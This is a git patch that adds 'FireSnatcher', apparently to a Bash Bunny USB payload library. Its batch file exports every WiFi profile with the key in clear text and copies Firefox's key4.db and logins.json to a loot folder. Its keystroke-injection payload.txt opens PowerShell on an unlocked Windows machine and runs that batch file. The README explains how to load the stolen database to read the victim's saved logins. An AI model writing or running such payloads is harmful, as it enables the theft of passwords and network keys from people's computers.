From f12c486e122e1fb37340538a7909269b152d8ff6 Mon Sep 17 00:00:00 2001 From: KarrotKak3 <104325530+KarrotKak3@users.noreply.github.com> Date: Fri, 29 Apr 2022 19:05:40 -0400 Subject: [PATCH] Add files via upload (#518) New Payload. FireSnatcher --- .../credentials/FireSnatcher/FireSnatcher.bat | 6 ++ .../credentials/FireSnatcher/README.md | 45 +++++++++++ .../credentials/FireSnatcher/payload.txt | 78 +++++++++++++++++++ 3 files changed, 129 insertions(+) create mode 100644 payloads/library/credentials/FireSnatcher/FireSnatcher.bat create mode 100644 payloads/library/credentials/FireSnatcher/README.md create mode 100644 payloads/library/credentials/FireSnatcher/payload.txt diff --git a/payloads/library/credentials/FireSnatcher/FireSnatcher.bat b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat new file mode 100644 index 00000000..d08c8229 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat @@ -0,0 +1,6 @@ +mkdir %~dp0\loot\%COMPUTERNAME% +cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear +C: cd \D %appdata%\mozilla\firefox\profiles\ +cd %appdata%\mozilla\firefox\profiles\*.default-release\ +copy key4.db %~dp0\loot\%COMPUTERNAME% +copy logins.json %~dp0\loot\%COMPUTERNAME% \ No newline at end of file diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md new file mode 100644 index 00000000..1d3b0dd0 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/README.md @@ -0,0 +1,45 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +**LED meanings** +- Magenta: Initial setup – about 1 – 3 seconds +- Single yellow blink: Attack in progress +- Green rapid flash, then solid, then off: Attack complete diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt new file mode 100644 index 00000000..143efd55 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/payload.txt @@ -0,0 +1,78 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +# LEDs +# ---- +# Magenta: Initial setup – about 1 – 3 seconds +# Single yellow blink: Attack in progress +# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed + +# Options +# ------- +# Name of Bash Bunny volume that appears to Windows (BashBunny is default) +BB_NAME="BashBunny" + +# Setup +# ----- +LED SETUP + + +# Attack +# ------ +ATTACKMODE HID STORAGE +Q DELAY 500 +LED ATTACK +Q DELAY 100 +Q GUI r +Q DELAY 100 +Q STRING powershell Start-Process powershell +Q ENTER +Q DELAY 7000 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')" +Q ENTER +Q DELAY 8000 +Q STRING EXIT +Q ENTER +sync +LED FINISH +Q DELAY 1500 +shutdown now +